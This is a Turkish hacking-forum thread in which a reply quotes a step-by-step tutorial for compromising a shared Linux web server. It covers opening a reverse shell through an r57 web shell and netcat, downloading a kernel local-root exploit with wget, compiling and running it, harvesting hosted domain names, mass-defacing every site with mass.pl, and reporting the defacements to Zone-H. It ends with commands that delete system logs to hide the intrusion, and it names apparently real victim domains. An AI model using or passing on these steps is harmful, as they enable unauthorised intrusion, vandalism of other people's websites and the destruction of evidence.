nasıl yapıyorlar?

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
30 Nis 2009
172
0
Mesala çok küçük 1 zaman aralığında adamlar binlerce site çökertyiyo

Bunların ISS hack denen ve root olmak denen 1 şey var (bir sitedeki açık üzerinden servere girilerek (bu bi kaç bin site hacklendi diolar ya o siteler bu server içinde ) kendi bilgisayarımız üzerinden o servere bağlanıyoruz.gine yanlış çeşitli exploitler tarafından o serverde root oluyorsun bi nevi o serverin admini oluyormuşsun)

Bunları biliyom bana ayrıntılı bilgi verirmisiniz?
sitede var demeyin inceledim ve beni tatmin etcek 1 cevap bulamadım benı aydınlatcek olanlar yazsın

veya link verin inceleyim

şimdiden teşekkürler yazan herkese
 

yenicerix

Özel Üye
8 Eyl 2006
413
28
Arkadaşım root denilen olay oldukça zordur. Eğer r57 shell hakkında fazla bilgi sahibi değilsen okuma derim bu yazıyı. Çünkü kafanı karıştırabilir biraz :)
Root olmak ileri seviye biraz.
Bir serverda root olabilmen için servera r57 shell yedirmen, bu servera göre bir exploit bulman gerekir. Biraz da şans :) Çünkü serverına göre exploit bulsan bile kesin root olabilecegimizi söyleyemeyiz..
Arşivimde root ile ilgili bir döküman var
Bu döküman linux server için...
Ancak baştan söyüyorum kafanı karıştırabilir biraz...
Ayrıca bu root konusunda en kısa zamanda bir video çekmeyi düşünüyorum...
----------------------------------------------------------------------
Gerekli olan malzemeler
-netcat
-shell (r57 önerilir)
-mass.pl
-zoneh.pl
-Bir adet index

Öncelikle netcat programının windows versiyonunu google dan bulup indirin ve "C"Klasörüne kopyalayın modeminizinde istediğiniz portunu açın forumda modeminizin nasıl portu açılacağını başka bir arkadaş anlatmıştı ondan dolayı anlatmıyorum

Netcat ve portumuzu ayarladık(ben:8888 portunu kullanacagım)

Başlat->çalıştır->cmd yazıp enterlıyoruz.Buraya nc -vv -l -p 8888 yazıyoruz ve alttaki resim karşımıza geliyor

ncvvlp888qa8.jpg


Şimd, r57 attgımızı siteye gelip r57 sayfasının en alt kısmına geliyoruz ve resimki yeri buluyoruz

r57connectak9.jpg


Burdaki 11457yi 8888 olarka değiştirip connecte tıklıyoruz ve bağlantıyı gerçekleştiriyoruz.

Şimdi aşağıdaki resimki gibi bağlandık

baglantiix3.jpg


Burdada görüyoruzki serverımızın sürümü:

Linux nexus.arazel.com 2.6.9-34.EL #1 Wed Mar 8 00:07:35 CST 2006 i686 i686 i38
GNU/Linux

Şimdi buna uygun linux kernel local root exploit arayacagız.milw0rm.coma girip aratıyoruz ve karşımıza exploitler geliyor.

http://www.milw0rm.com/exploits/2005

İşte kullanacagımız, serverımıza uygun local root exploit.Ama bu .c dilinde.Bunu notepade kaydedip daha sonra uzantısını .c olarka değiştiriyoruz

26xmasaustuux4.jpg

Kaynak: Wardom Linux Server Root "İleri Seviye Kullanıcılar İçin" - Wardom.Org

Evet üsttede göründüğü gibi ben 2.6.x.c olarak kaydettim.

Şimdi bunu serverımıza upload edelim ve derleyelim.

26xcekmeag2.jpg


2.6.x.c yi ben http://parkbulvar.net/2.6.x.c olarak kendi siteme upload ettim.

Şimdi wget komutu ile benim siteden bu exploiti server'a çekelim(üstteki resim)

wget http://parkbulvar.net/2.6.x.c

eget saved dedi ve işlem tamam.Şimdi bu .c exploiti derleyeceğiz

rootbv4.jpg


üstteki resimde göründüğü gibi derleyelim.

Yani gcc -o root 2.6.x.c yapıyoruz.Şimdi exploitimiz derlendi ve root adını aldı.Bu root adlı derlenmiş exploite full yetki verelim;

chmod 777 root

Şimdi bu derlenmiş exploiti çalışıtralım

rootlandijq7.jpg


üstteki resimde exploitimizi çalıştırdık.Yani

./root -> exploiti çalıştırma

Daha sorna id yazarak serverdaki durumumuzu öğrenelim.

eger resimdeki gibi uid:0(root) yazıyorsa.Exploit işe yaradı, server rootlandı demektir.

Resimdede oldugu gibi serverı rootladık.

Şimdi tüm siteleri deface edeceğiz.

Serverdaki siteleri whois çekerek bakabiliriz

whoises2.jpg


Whois'te 2 site gözüküyor.Napalım şansızlık

Eger whoiste domain adları yoksa ve serverdada belli değilse domain adları bakmanız gerekn yerler şuralardır.

/var/cpanel
/etc/httpd/conf/httpd.conf
etc/shadow
/var/named

Büyük ihtimalle burdaki yerlerden birinde domain adları mevcuttur.

Şimdi bizde control edelim

cd /var/named yazarak bu dizine geçiyoruz

ve ls yazarak bu dizindeki dosyaları listeliyoruz

sitelerqz5.jpg


İşte karşınızda domain isimleri.Sadece sonraki .db kısımlarını silmeniz yeterlidir.

arazel.com
brguild.com
brguild.org
clan-forsaken.com
danielhiggins.com
delucaspizzeria.com
dontknow.com
excessive-gaming.net
greyedge.com
houseforsaken.com
jeweladdict.com
keanpride.org
kindred192.com
mybox.mybox.com
named.ca
phosaigonexpress.com
webdetailing.com

Domainlerimiz üstte , şimdi bunu domain.txt olarak kaydediyoruz ve bir kenarda bekletiyoruz

Tüm siteleri deface etmek için mass.pl gereklidir. Ben size konuyla birlikte vereceğim.Şimdi mass.pl yi en başta r57.php attıgımız dizine upload ediyoruz.

perl mass.pl yazarak kullanımı karşımıza geliyor

masssa7.jpg


example: perl mass.pl /tmp/index.html yazmış.

Bu şu demektir... /tmp/index.html -> burdaki indexi tüm klasörlere kopyala.

Burdaki /tmp dizini zorunlu değildir.Ben r57nin bulundugu dizini kullanacagım.

perl mass.pl /home/clanfo/domains/clan-forsaken.com/public_html/memberdb/admin/index.html

Resimdede oldugu gibi tüm siteler defacing ediliyor.

masscalistirjs2.jpg


Bir kaç dakika sonra sitelerde indexini göreceksinizdir.

Şimdi sıra geldi zone-h almaya.zoneh.pl yi perl'inizin kurulu oldugu dizinde perl->bin-> buraya atıyorsunuz.

Şimdi başlat->çalıştır->cmd diyoruz ve burdan perl'in kurulu oldugunu dizinde perl->bin buraya geliyorsunuz.

Üst dizine çıkmak için cd.. , dizine girmek içi cd [dizin-adı] yapıcaksınız.
Kaynak: Wardom Linux Server Root "İleri Seviye Kullanıcılar İçin" - Wardom.Org

Buraya gelince perl zoneh.pl diyince kullanımını görelim

zonehus8.jpg


kullanımı: perl zoneh.pl <liste adı.txt> <ad>

Yukarda serverdaki siteleri bir txt yapıp kaydetmiştik.Onu zoneh.pl nin oldugu dizine atıyoruz ve;

perl zoneh.pl domain.txt xoron

yazıp enterlıyoruz ve eklendiğine bakıyoruz

zoneheklemewi7.jpg


EVET İNDEXİMİ ATILMIŞ.


SİTELERİ İNDEXLERKEN KULLANDIGIMIZ MASS.PL LOGLARI SİLECEKTİR AMA SİZ GENEDE AŞAĞIDAKİ KODLARI KULLANARAK LOGLARINIZI SERVERDAN SİLİN

rm - rf /var/log
rm - rf /var/adm
find/- name .bash_logout - exec rm - rf {} \;
find/- name *.log - exec rm - rf {} \;

Alıntıdır...
------------------------------------------------------------------------------------------
 

CoDeRMaNn

Uzman üye
27 Nis 2009
1,413
0
Türkiye Cumh
Komutanımın dediği gibi fazla bilgin yoksa okuma ayrıca yeni basladıysan bu ise yanlıs yerden baslamısın sana bi arkadas tavsiyesi önce site acıklarını öğren onlar ne ise yarar nasıl kulanılır Shell hesabı al shell sokmayı öğren bu is öle kolay değil sabı sabır :D
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.